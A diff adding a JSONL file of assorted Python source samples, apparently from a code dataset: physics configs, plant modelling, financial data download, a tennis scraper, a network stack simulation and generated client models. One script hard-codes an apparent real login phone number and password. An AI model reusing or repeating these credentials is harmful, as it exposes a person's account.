diff --git "a/4164.jsonl" "b/4164.jsonl" new file mode 100644--- /dev/null +++ "b/4164.jsonl" @@ -0,0 +1,608 @@ +{"seq_id":"399278530","text":"import FWCore.ParameterSet.Config as cms\nfrom math import pi\nimport FWCore.Utilities.FileUtils as FileUtils\nimport FWCore.ParameterSet.VarParsing as VarParsing\n\n\nprocess = cms.Process(\"TEST\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\n\n\nprocess.load('Configuration.Geometry.GeometryExtended2026D35Reco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2026D35_cff')\n\noptions = VarParsing.VarParsing ('analysis')\n# get and parse the command line arguments\n\noptions.register('skipEvents',\n 0,\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.int,\n \"Number of events to skip\")\noptions.register('outFile',\n 'L1Ntuple.root',\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n 'Output file')\n\noptions.parseArguments()\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n\nfileList = FileUtils.loadListFromFile('snu.list')\nreadFiles = cms.untracked.vstring(*fileList)\n\nprocess.source = process.source = cms.Source(\"PoolSource\",\n fileNames = readFiles,\n)\n\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic', '')\n\nprocess.load(\"L1Trigger.L1TNtuples.l1TrackMETTreeProducer_cfi\")\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('L1Ntuple.root')\n)\n\n\nprocess.p = cms.Path(process.l1TrackMETTree)\n ","sub_path":"L1TTrackMatch/test/test_L1TrackMET_Ntuple_cfg.py","file_name":"test_L1TrackMET_Ntuple_cfg.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"14322464","text":"from pfisGraph import PfisGraph\nfrom pfisGraphWithVariants import PfisGraphWithVariants\nfrom pfisGraphWithSimilarPatches import PfisGraphWithSimilarPatches\n\nclass GraphFactory:\n\tdef __init__(self, langHelper, dbPath, projSrcPath, stopWords=[]):\n\t\tself.langHelper = langHelper\n\t\tself.dbPath = dbPath\n\t\tself.projSrcPath = projSrcPath\n\t\tself.stopWords = stopWords\n\n\tdef getGraph(self, graphType, variantsDb):\n\t\tif graphType == None:\n\t\t\tgraphType = \"PfisGraph\"\n\n\t\tif graphType.lower() == \"PfisGraph\".lower():\n\t\t\treturn PfisGraph(self.dbPath, self.langHelper, self.projSrcPath, self.stopWords)\n\n\t\tif graphType.lower() == \"PfisGraphWithVariants\".lower():\n\t\t\treturn PfisGraphWithVariants(self.dbPath, self.langHelper, self.projSrcPath, self.stopWords)\n\n\t\tif graphType.lower() == \"PfisGraphWithSimilarPatches\".lower():\n\t\t\tif variantsDb is None:\n\t\t\t\traise Exception(\"Missing attrib: variantsDb for graphType PfisGraphWithSimilarPatches in XML config file.\")\n\t\t\treturn PfisGraphWithSimilarPatches(self.dbPath, self.langHelper, self.projSrcPath, variantsDb, self.stopWords)","sub_path":"src/python/graphFactory.py","file_name":"graphFactory.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629263758","text":"# ipython --gui=qt\nfrom cereals import build_shoot, parametric_leaf, leaf_azimuth, shoot_at_stage\nfrom display import display_mtg, build_scene, display_scene\nfrom stand import agronomic_plot\nfrom simple_maize import bell_shaped_dist, geometric_dist\nfrom geometry import form_factor\nimport pandas\nimport numpy\nimport sky_sources as skys\nimport light_it as ltfs\n\n\n\n# generation of a 3D plant from descritive parameters\nstem_radius=0.5\ninsertion_heights=(10,20)\nleaf_lengths=(10,10)\nleaf_areas=(10,10)\n# type ?parametric_leaf for parameter siginification\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=50, scurv=0.5,curvature=50, alpha=-2.3)\nleaf_shapes = [a_leaf for l in leaf_lengths]\n# type ?leaf_azimuths for parameter siginification\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False)\n#\nshoot, g = build_shoot(stem_radius=stem_radius, insertion_heights=insertion_heights, leaf_lengths=leaf_lengths, leaf_areas=leaf_areas,\n leaf_shapes=leaf_shapes, leaf_azimuths=leaf_azimuths)\nscene, nump = build_scene(g)\ndisplay_scene(scene)\n\n# some plausible value for a maize plant\nstem_radius=1\nleaf_areas = bell_shaped_dist(plant_area=10000)\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=50, scurv=0.5,curvature=50, alpha=-2.3)\nff = form_factor(a_leaf)\nleaf_lengths = numpy.sqrt(numpy.array(leaf_areas) / 0.1 / ff)\ninsertion_heights = numpy.cumsum(geometric_dist(height=200))\nleaf_shapes = [a_leaf for l in leaf_lengths]\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False)\n\n\n# some realistic values for a wheat plant\ndf = pandas.read_csv('wheat.csv')\nstem_radius=0.25\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=30, scurv=0.5,curvature=20, alpha=-1.5)\nff = form_factor(a_leaf)\nleaf_areas = df.L_blade * df.W_blade * ff\nleaf_lengths = df.L_blade\ninsertion_heights = df.H_blade\nleaf_shapes = [a_leaf for l in leaf_lengths]\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=600, phyllotactic_deviation=10, plant_orientation=0, spiral=True)\n\n\n# generate x,y position for a stand\nnplants, positions, domain, domain_area, unit = agronomic_plot(1, 1, 10,10,0.75)\nplants = [g for i in range(nplants)]\nscene, nump = build_scene(plants, positions)\ndisplay_scene(scene)\n\n# vertical light interception\ncs, ei, df = ltfs.illuminate(scene, scene_unit='cm')\ncs.plot(ei)\n\n\n\n#diffuse light interception\nsources = skys.sky_sources()\ncs, ei, df = ltfs.illuminate(scene, light=sources, scene_unit='cm')\ncs.plot(ei)\n\n# get score per plant\ndef score(res):\n return pandas.Series({'ei':(res.Ei*res.area).sum() / res.area.sum(),\n 'area': res.area.sum()})\ndf['nump']=nump\ndf.groupby('nump').apply(score)\n","sub_path":"cereals/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533925281","text":"import wget\nfrom jqdatasdk import *\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport json\n\n\ndef get_hs300_index():\n df = get_price(\"000300.XSHG\", start_date=\"2011-01-01\", end_date=\"2019-01-01\", fq=None)\n df.to_csv(r\"data_files\\HS300_None.csv\")\n\n\ndef get_hs300_future():\n info = pd.read_csv(r\"data_files\\future\\hs300_future_info.csv\", index_col=0)\n for contract in info[\"name\"]:\n df = get_price(contract + \".CCFX\", start_date=\"2011-01-01\", end_date=\"2019-01-01\", fq=None)\n df.to_csv(r\"data_files\\future\\%s.csv\" % contract)\n\n\ndef get_future_info():\n df = get_all_securities(types=['futures'])\n df.to_csv(r\"data_files\\future\\info.csv\", encoding=\"gbk\")\n\n\ndef get_hs300_stock_info():\n path = r\"data_files\\stock\\hs300_stocks.json\"\n stocks = {}\n for year in range(2011, 2019):\n first = \"%d-03-01\" % year\n second = \"%d-09-01\" % year\n stocks[first] = get_index_stocks('000300.XSHG', first)\n stocks[second] = get_index_stocks('000300.XSHG', second)\n with open(path, \"w\") as f:\n json.dump(stocks, f)\n\n\ndef get_hs300_stock_quote():\n code_path = r\"data_files\\stock\\hs300_stocks.json\"\n store_path = r\"data_files\\stock\\quote\\%s.csv\"\n with open(code_path, \"r\") as f:\n stocks = json.load(f)\n stock_set = set()\n for value in stocks.values():\n stock_set.update(value)\n for stock in stock_set:\n df = get_price(stock, start_date=\"2011-01-01\", end_date=\"2019-01-01\", fq=None)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_stock_bonus():\n code_path = r\"data_files\\stock\\hs300_stocks.json\"\n store_path = r\"data_files\\stock\\bonus\\%s.csv\"\n with open(code_path, \"r\") as f:\n stocks = json.load(f)\n stock_set = set()\n for value in stocks.values():\n stock_set.update(value)\n for stock in stock_set:\n q = query(finance.STK_XR_XD). \\\n filter(finance.STK_XR_XD.code == stock,\n finance.STK_XR_XD.report_date >= '2010-01-01',\n finance.STK_XR_XD.report_date <= '2019-01-01'). \\\n order_by(finance.STK_XR_XD.report_date)\n df = finance.run_query(q)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_stock_valuation():\n store_path = r\"data_files\\temp\\%s.csv\"\n stock_set = ['600760.XSHG', '002032.XSHE', '002120.XSHE', '002179.XSHE', '002271.XSHE', '002311.XSHE', '300142.XSHE', '603156.XSHG', '300296.XSHE', '002773.XSHE', '603986.XSHG', '601066.XSHG', '603259.XSHG', '601138.XSHG']\n for stock in stock_set:\n q = query(valuation.market_cap).filter(valuation.code == stock)\n panel = get_fundamentals_continuously(q, end_date=\"2019-01-01\", count=8 * 250)\n df = panel.minor_xs(stock)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_index_info():\n store_path = r\"data_files\\index\\weight\\%s.csv\"\n code_path = r\"data_files\\index\\HS300_index.csv\"\n index = pd.read_csv(code_path, index_col=0)\n for date in index.index:\n df = get_index_weights(\"000300.XSHG\", date)\n df.to_csv(store_path % date)\n\n\ndef get_hs300_future_price():\n info_path = r\"data_files\\future\\hs300_future_info.csv\"\n store_path = r\"data_files\\future\\settle\\settle.csv\"\n info = pd.read_csv(info_path, index_col=0)\n df = get_extras('futures_sett_price', list(info.index), start_date='2011-01-01', end_date='2019-01-01', df=True)\n df.to_csv(store_path)\n\n\ndef get_settle_param():\n base_url = r\"http://www.cffex.com.cn/sj/jscs/%s/%s/%s_1.csv\"\n start_date = datetime(2011, 1, 1)\n end_date = datetime(2019, 1, 1)\n for i in range((end_date - start_date).days + 1):\n date = start_date + timedelta(days=i)\n url = base_url % (date.strftime(\"%Y%m\"), date.strftime(\"%d\"), date.strftime(\"%Y%m%d\"))\n store_path = r\"data_files\\future\\param\\%s.csv\" % date.strftime(\"%Y%m%d\")\n # try:\n wget.download(url, store_path)\n # except Exception as err:\n # print(err)\n\n\ndef get_remain():\n print(get_query_count())\n\n\nif __name__ == \"__main__\":\n auth(\"15066299571\", \"jiayouLGX,1996.\")\n # get_hs300_future()\n # get_future_info()\n # get_hs300_index()\n # get_hs300_stock_info()\n # get_hs300_stock_quote()\n # get_hs300_stock_bonus()\n # get_hs300_stock_valuation()\n # get_hs300_index_info()\n # get_hs300_future_price()\n # get_settle_param()\n get_hs300_stock_valuation()\n get_remain()\n","sub_path":"data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303401185","text":"import Read\nimport dht11\nimport sqlite3\nimport datetime\n\t\ndef sensorRead():\n\tID = Read.machinedata()\n\tweather = dht11.thermo()\n\treturn(ID, weather)\n\ndef dbConnect(dbFile):\n\ttry:\n\t\tconn = sqlite3.connect(dbFile)\n\t\treturn(conn)\n\texcept error as E:\n\t\tprint(E)\n\treturn(None)\n\ndef createTable(conn, sqlStatement):\n\ttry:\n\t\tc = conn.cursor()\n\t\tc.execute(sqlStatement)\n\texcept error as E:\n\t\tprint(E)\n\n#def insertData(conn, sqlStatement, ):\n#\ttry:\n#\t\tc = conn.cursor()\n#\t\tc.execute(sqlStatement)\n#\texcept error as E:\n#\t\tprint(E)\n\ndef main():\n\tdatetime = datetime.datetime.now()\n\tID = sensorRead[0]\n\ttemperature = sensorRead[1]\n\thumidity = sensorRead[2]\n\n\tdatabase = (\"/home/pi/TTFProject/flaskdb/venv/TTF.db\")\n\n\tsql_create_user = (\"\"\" CREATE TABLE IF NOT EXISTS userData (\n id integer PRIMARY KEY,\n datetime integer\n ); \"\"\")\n\n\tsql_create_weather = (\"\"\" CREATE TABLE IF NOT EXISTS weather (\n temperature integer PRIMARY KEY,\n humidity integer NOT NULL,\n ); \"\"\")\n\n\tsql_insert_userData = (\"INSERT INTO userData (id, DATETIME) VALUES (?, ?)\")\n\tsql_insert_weather = (\"INSERT INTO weather (temperature, humidity) VALUES (?, ?)\")\n\n\n\tconn = dbConnect(database)\n\tif conn is not None:\n\t\tc = conn.cursor()\n\t\tc.execute(sql_insert_userData, [ID, datetime])\n\t\tc.execute(sql_insert_weather, [temperature, humidity])\n\t\tconn.commit()\n\t\tconn.close()\n\nif __name__ == '__main__':\t\n\tmain()\n\n\n\n\n","sub_path":"MFRC522-python/machineData1.py","file_name":"machineData1.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85483332","text":"from setuptools import setup\nfrom distutils.util import convert_path\n\n\ndef find_version():\n environment = {}\n version_path = convert_path('wif/version.py')\n with open(version_path) as file:\n contents = file.read()\n exec(contents, environment)\n version = environment['__version__']\n return version\n\n\nsetup(\n name='wif',\n version=find_version(),\n description='WIF tools',\n url='http://github.com/ucll-3dcg/wif',\n author='Frederic Vogels',\n author_email='frederic.vogels@ucll.be',\n license='MIT',\n packages=['wif', 'wif.gui'],\n entry_points={\n 'console_scripts': ['wif=wif.main:main']\n },\n install_requires=['pillow', 'numpy', 'opencv-contrib-python'],\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"216628751","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 13 16:56:45 2014\r\n\r\n@author: Gaspard, Thomas, Arnaud\r\n\"\"\"\r\n\r\nfrom utils import *\r\n\r\nimport urllib\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport re\r\n\r\n\r\nmc_url_matches = \"http://www.atpworldtour.com/Share/Match-Facts-Pop-Up.aspx\"\r\n\r\nmc_fields = {\r\n# 'Tournament' : [ 0 , 'a' , None ],\r\n# 'Round' : [ 1 , 'td', None ],\r\n# 'Name' : [ 4 , 'a' , 'str' ],\r\n# 'Country' : [ 5 , 'p' , 'str' ],\r\n 'Aces' : [ 6 , 'td', 'int' ],\r\n 'DoubleFaults' : [ 7 , 'td', 'int' ],\r\n 'FirstServe' : [ 8 , 'td', 'stat'],\r\n 'FirstServePointsWon' : [ 9 , 'td', 'stat'],\r\n 'SecondServePointsWon' : [ 10, 'td', 'stat'],\r\n 'BreakPointsSaved' : [ 11, 'td', 'stat'],\r\n 'ServiceGamesPlayed' : [ 12, 'td', 'int' ],\r\n 'FirstServeReturnPointsWon' : [ 13, 'td', 'stat'],\r\n 'SecondServeReturnPointsWon': [ 14, 'td', 'stat'],\r\n 'BreakPointsConverted' : [ 15, 'td', 'stat'],\r\n 'ReturnGamesPlayed' : [ 16, 'td', 'int' ],\r\n 'TotalServicePointsWon' : [ 17, 'td', 'stat'],\r\n 'TotalReturnPointsWon' : [ 18, 'td', 'stat'],\r\n 'TotalPointsWon' : [ 19, 'td', 'stat']\r\n }\r\n\r\n\r\n# TODO time 68 minutes -> 68\r\n\r\ndef parseSimple(line, balise):\r\n return line.find(balise).contents[0]\r\n\r\ndef parseStr(line, balise):\r\n aux = line.find_all(balise)\r\n return [ aux[0].contents[0], aux[1].contents[0] ]\r\n\r\ndef parseInt(line, balise):\r\n aux = parseStr(line,balise)\r\n return [ int(aux[0]), int(aux[1]) ]\r\n\r\ndef parseStat(line, balise):\r\n aux = parseStr(line,balise)\r\n s1 = re.findall( \"\\((.*)/(.*)\\)\", aux[0])[0]\r\n s2 = re.findall( \"\\((.*)/(.*)\\)\", aux[1])[0]\r\n return [ int(s1[0]), int(s1[1]), int(s2[0]), int(s2[1]) ]\r\n\r\n\r\ndef getInfoRows(t,y,r,p):\r\n url_file = urllib.urlopen(mc_url_matches + \"?t=\" + t + \"&y=\" + y + \"&r=\" + r + \"&p=\" + p)\r\n dom = BeautifulSoup(url_file)\r\n a = dom.find_all('tr', 'infoRow')\r\n if len(a) != 20:\r\n return printError(\"Mauvaise longueur : \" + str(len(a)) + \" != 20\")\r\n return a\r\n\r\ndef getMatchInfos(t,y,r,p):\r\n a = getInfoRows(t,y,r,p)\r\n result = [ dict(), dict() ]\r\n \r\n for k,v in mc_fields.iteritems():\r\n line = a[v[0]]\r\n balise = v[1]\r\n if v[2] == 'str':\r\n l = parseStr(line, balise)\r\n result[0][k] = l[0]\r\n result[1][k] = l[1]\r\n elif v[2] == 'int':\r\n l = parseInt(line, balise)\r\n result[0][k] = l[0]\r\n result[1][k] = l[1]\r\n elif v[2] == 'stat':\r\n l = parseStat(line, balise)\r\n result[0][k] = l[0]\r\n result[0][k + \"Total\"] = l[1]\r\n result[1][k] = l[2]\r\n result[1][k + \"Total\"] = l[3]\r\n else:\r\n result[0][k] = parseSimple(line, balise)\r\n result[1][k] = parseSimple(line, balise)\r\n \r\n \r\n duration = int( re.findall('([0-9]+)', parseSimple(a[2], 'td'))[0] )\r\n result[0]['Duration'] = duration\r\n result[1]['Duration'] = duration\r\n \r\n result[0][\"IDPlayer\"] = re.findall('Players\\/(.*).aspx\\'\\,\\'_blank', a[4].find_all('a')[0].attrs['onclick'] )[0]\r\n result[1][\"IDPlayer\"] = re.findall('Players\\/(.*).aspx\\'\\,\\'_blank', a[4].find_all('a')[1].attrs['onclick'] )[0]\r\n result[0]['IDOpponent'] = result[1]['IDPlayer']\r\n result[1]['IDOpponent'] = result[0]['IDPlayer']\r\n \r\n namePlayers = parseStr( a[4], 'a')\r\n win = parseSimple(a[3], 'a')\r\n result[0]['Win'] = int(win == namePlayers[0] )\r\n result[1]['Win'] = int(win == namePlayers[1] )\r\n \r\n return result\r\n\r\n\r\ndef addMatchInfos(match, dicoPlayers):\r\n m = getMatchInfos( match['t'], match['y'], match['r'], match['p'] )\r\n for field in match:\r\n m[0][field] = match[field]\r\n m[1][field] = match[field]\r\n m[0]['Scores'] = m[0]['WinnerScores'] if m[0]['Win'] else m[0]['LoserScores']\r\n m[1]['Scores'] = m[1]['WinnerScores'] if m[1]['Win'] else m[1]['LoserScores']\r\n \r\n # May generate errors !!!\r\n m[0]['IDOpponent'] = dicoPlayers[ m[0]['IDOpponent'] ]['ID']\r\n m[1]['IDOpponent'] = dicoPlayers[ m[1]['IDOpponent'] ]['ID']\r\n m[0]['IDPlayer'] = dicoPlayers[ m[0]['IDPlayer' ] ]['ID']\r\n m[1]['IDPlayer'] = dicoPlayers[ m[1]['IDPlayer' ] ]['ID']\r\n \r\n return m\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Save/matchCrawler.py","file_name":"matchCrawler.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"298733306","text":"import os\nimport csv\nimport glob\n\n\ndef new_v(files_path, output_name):\n interesting_files = glob.glob(os.path.join(files_path, \"*.csv\"))\n result = None\n for filename in interesting_files:\n with open(filename) as fin:\n data = list(csv.reader(fin, delimiter=';'))\n if result is None:\n result = ([data[0]])\n result += data[1:]\n with open(output_name, 'w', newline='') as out:\n write = csv.writer(out, delimiter=';')\n write.writerows(result)\n\n\nnew_v('raw_results', 'raw_results.csv')\nnew_v('summary_results', 'summary_results.csv')\n","sub_path":"results/merge_results.py","file_name":"merge_results.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"737576","text":"import sqlite3\n\n\nconn = sqlite3.connect('study_part1.sqlite3')\ncurs = conn.cursor()\n\nquery1 = \"\"\"\nSELECT AVG(age)\nFROM example;\n\"\"\"\n\nquery2 = \"\"\"\nSELECT student\nFROM example\nWHERE sex='Female';\n\"\"\"\n\nquery3 = \"\"\"\nSELECT COUNT(studied)\nFROM example\nWHERE studied='True';\n\"\"\"\n\nquery4 = \"\"\"\nSELECT *\nFROM example\nORDER BY student DESC;\n\"\"\"\n\nqueries = [query1, query2, query3, query4]\n\n\ndef exe_query(query):\n records = curs.execute(query).fetchall()\n return f'{records} \\n'\n\n\nif __name__ == \"__main__\":\n for query in queries:\n print(exe_query(query))\n curs.close()\n conn.close()\n","sub_path":"study-guide/part1_queries.py","file_name":"part1_queries.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537098333","text":"numbers_in_set = int(input())\n\nwhile True:\n try:\n a_set = set(map(int, input().split()))\n if len(a_set) > numbers_in_set or len(a_set) < numbers_in_set:\n raise ValueError\n break\n except ValueError:\n print(f\"Invalid set. The number of elements has to be {numbers_in_set}.\")\n\nnumber_other_sets = int(input())\n\n\nfor i in range(number_other_sets):\n command, length = input().split()\n other_set = set(map(int, input().split()))\n getattr(a_set, command)(other_set)\n\nprint(sum(a_set))\n","sub_path":"src/Week8/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5194717","text":"import threading\nimport queue\nimport LayerPhy\nimport random\n\nclass NetworkStack(object):\n\n def __init__(self, masterHost='127.0.0.1', baseport=10000, own_identifier=\"A\"):\n self.__applicationList = []\n self.__physicalLayer=LayerPhy.LayerPhy(upperLayerCallbackFunction=self.layer2_incomingPDU,\n masterHost=masterHost, baseport=baseport)\n\n self._layer2_outgoing_packages = queue.Queue()\n self._layer2_flag = threading.Event()\n self._own_identifier = own_identifier\n\n # Do not change!\n def leaveNetwork(self):\n self.__physicalLayer.API_leave()\n\n # Do not change!\n def applicationAddCallback(self, applicationPort, callBack):\n self.__applicationList.append((applicationPort, callBack))\n\n # Do not change!\n def application_layer_incomingPDU(self, source, applicationPort, pdu):\n for (thisApplicationPort, thisApplication) in self.__applicationList:\n if thisApplicationPort == applicationPort:\n thisApplication(source, applicationPort, pdu)\n\n # Do not change!\n def application_layer_outgoingPDU(self, destination, applicationPort, pdu):\n self.layer4_outgoingPDU(destination, applicationPort, pdu)\n\n def initiateToken(self):\n #L'ordinateur à le jeton, il peut donc envoyer un message.\n #On met la condition lui permettant d'envoyer un message à vrai\n self._layer2_flag.set()\n\n def layer4_incomingPDU(self, source, pdu):\n print(\"Layer4: Received %s from %s\" % (pdu, source))\n #On récupère le port d'application pour pouvoir appeler le callback\n #correspondant au port d'application\n port, _, body = pdu.partition(\":\")\n self.application_layer_incomingPDU(source, int(port), body)\n\n\n def layer3_incomingPDU(self, interface, pdu):\n print(\"Layer3: Interface %d: Received %s\" % (interface, pdu))\n #On récupère l'adresse de destination du message pour la comparer à la sienne\n dest, src, body = pdu.split(\"|\")\n if dest == self._own_identifier:\n #Si le message nous est destiné, on le transmet à la couche 4\n self.layer4_incomingPDU(src, body)\n else:\n #Sinon on le renvoie tel quel\n self.layer3_outgoingPDU(dest, pdu, src)\n\n def layer2_incomingPDU(self, interface, pdu):\n print(\"Layer2: Interface %d: Received %s\" % (interface, pdu))\n if interface == 0: # same ring\n nb_packages, _, data = pdu.partition(';')\n #On récupère le nombre de messages\n try:\n nb_packages = int(nb_packages)\n except:\n # Cas des paquets vide\n nb_packages = 0\n\n #On récupère la taille de chaque message\n len_packages = []\n for _ in range(nb_packages):\n len_package, _, data = data.partition(';')\n tmp = 0\n try:\n tmp = int(len_package)\n except:\n # Cas des paquets vide\n tmp = 0\n len_packages.append(tmp)\n #On sépare les paquets en sous-paquets (un sous-paquet est un message contenu dans le paquets)\n for len_package in len_packages:\n package, data = data[:len_package], data[len_package:]\n #On envoi le sous paquet à la couche 3\n self.layer3_incomingPDU(interface, package)\n\n else: # Another Ring, this is for routing, see later\n pass\n\n #On peut envoyer un message (un fois que le paquet à été traité)\n self._layer2_flag.set()\n\n def layer4_outgoingPDU(self, destination, applicationPort, pdu):\n print(\"Layer4: Sending message %s to %s\" % (pdu, destination))\n #On transmet le message à la couche 3 en y ajoutant le port d'application,\n #séparé par un : du corps du message : \n # :\n self.layer3_outgoingPDU(destination,\n ':'.join([str(applicationPort),\n pdu]))\n\n def layer3_outgoingPDU(self, destination, pdu, from_=None):\n print(\"Layer3: Sending out %s to interface %d\" % (pdu, 0))\n #On transmet le message à la couche 2 en y ajoutant l'adresse de \n #de destination et l'adresse source, séparé par des | :\n # ||\n self.layer2_outgoingPDU(0,\n \"{dest}|{src}|{body}\".format(dest=destination, src=from_ or\n self._own_identifier, body=pdu))\n\n\n def layer2_outgoingPDU(self, interface, pdu):\n print(\"Layer2: Sending out %s to interface %d\" % (pdu, interface))\n #On ajoute le message dans la file d'attente\n self._layer2_outgoing_packages.put(pdu)\n #On attent de pouvoir envoyer un message\n self._layer2_flag.wait()\n\n #Lorsqu'on peut envoyer un message\n packages = []\n try:\n while True:\n packages.append(self._layer2_outgoing_packages.get())\n except queue.Empty:\n pass\n #On forme le paquet :\n # ;;...;\n msg = '{};'.format(len(packages))\n for package in packages:\n msg += '{};'.format(len(package))\n for package in packages:\n msg += package\n\n print(\"Layer2: Sending out %s to interface %d\" % (msg, interface))\n self.__physicalLayer.API_sendData(interface, msg)\n","sub_path":"NetworkStack.py","file_name":"NetworkStack.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108201554","text":"# File: simulation.py\n\nimport random\nimport utils\nfrom math_objects import Interval, PRECISION\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nN = 10\n\ndef find_interval(val, intervals):\n\tfor interval in intervals:\n\t\tif interval.within(val):\n\t\t\treturn interval\n\treturn None\n\ndef dist_to_closest_interval(val, intervals):\n\tinterval = find_interval(val, intervals)\n\n\tassert interval != None\n\n\tmid = (interval.getUpper() + interval.getLower())/2\n\n\tif val < mid:\n\t\treturn val - interval.getLower()\n\telif val > mid:\n\t\treturn interval.getUpper() - val\n\telse:\n\t\treturn 0\n\ndef search(arr, val, search_index = 0):\n\tfor index, el in enumerate(arr):\n\t\tif el[search_index] == val:\n\t\t\treturn index\n\treturn None\n\ndef test_n_intervals(n):\n\n\tpts = []\n\tk = 0\n\tkMax = 10000\n\tI = Interval(0, 1)\n\tI.prepare(1e-4)\n\tsmall_intervals = I.partition_discrete(n)\n\tp = 0 \n\twhile(True):\n\t\trpt = I.randompt()\n\t\tp = max(0, rpt)\n\t\td = dist_to_closest_interval(rpt, small_intervals)\n\t\tsearch_index = search(arr = pts, val = round(rpt, PRECISION), search_index = 0)\n\t\tif search_index != None:\n\t\t\tpts[search_index][1] += d\n\t\t\t#print(pts[search_index])\n\t\telse:\n\t\t\tpts.append([ round(rpt, PRECISION), d ]) \n\t\tif k >= kMax:\n\t\t\tbreak\n\t\telse:\n\t\t\tk += 1\n\tprint(p)\n\treturn pts\n\ndef plot_data(results):\n\tdata = np.array(results)\n\tdata = data[data[:,0].argsort()]\n\tplt.xticks(list(range(0,len(results),100)), data[:,0])\n\tplt.plot(data[:,0],data[:,1].astype(float))\n\t#plt.plot(a[:,2].astype(float))\n\tplt.show()\t\n\nif __name__ == '__main__':\n\tresult = test_n_intervals(N)\n\tplot_data(result)\n\t#print(result)\n\n\n\n","sub_path":"Computing-Error-Range-Using-Monte-Carlo-Simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304545901","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\nfrom msrest.exceptions import HttpOperationError\n\n\nclass CloudError(Model):\n \"\"\"CloudError.\n \"\"\"\n\n _attribute_map = {\n }\n\n\nclass Error(Model):\n \"\"\"Error.\n\n :param status:\n :type status: int\n :param message:\n :type message: str\n \"\"\"\n\n _attribute_map = {\n 'status': {'key': 'status', 'type': 'int'},\n 'message': {'key': 'message', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(Error, self).__init__(**kwargs)\n self.status = kwargs.get('status', None)\n self.message = kwargs.get('message', None)\n\n\nclass ErrorException(HttpOperationError):\n \"\"\"Server responsed with exception of type: 'Error'.\n\n :param deserialize: A deserializer\n :param response: Server response to be deserialized.\n \"\"\"\n\n def __init__(self, deserialize, response, *args):\n\n super(ErrorException, self).__init__(deserialize, response, 'Error', *args)\n\n\nclass FirstParameterGroup(Model):\n \"\"\"Additional parameters for a set of operations, such as:\n ParameterGrouping_post_multi_param_groups,\n ParameterGrouping_post_shared_parameter_group_object.\n\n :param header_one:\n :type header_one: str\n :param query_one: Query parameter with default. Default value: 30 .\n :type query_one: int\n \"\"\"\n\n _attribute_map = {\n 'header_one': {'key': '', 'type': 'str'},\n 'query_one': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(FirstParameterGroup, self).__init__(**kwargs)\n self.header_one = kwargs.get('header_one', None)\n self.query_one = kwargs.get('query_one', 